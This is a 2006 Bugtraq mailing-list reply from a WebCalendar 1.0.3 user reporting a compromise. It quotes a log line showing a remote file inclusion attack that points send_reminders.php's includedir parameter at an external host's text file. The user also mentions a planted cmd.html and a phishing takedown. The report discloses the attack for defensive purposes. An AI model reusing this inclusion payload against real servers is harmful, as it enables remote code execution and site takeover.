[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: WebCalendar-1.0.3 reading of any files
From: webcalendar () bouwmansgoed ! nl
Date: 2006-09-29 22:21:49
Message-ID: 20060929222149.4182.qmail () securityfocus ! com
[Download RAW message or body]
After finding these entries in the logfile and finding a cmd.html-file in this directory, I was disconnected because I was working as a phishing-site.
"POST /WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt? HTTP/1.1" 200 7315
In other words, the attacker has improved his actions.
More files are available on request.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic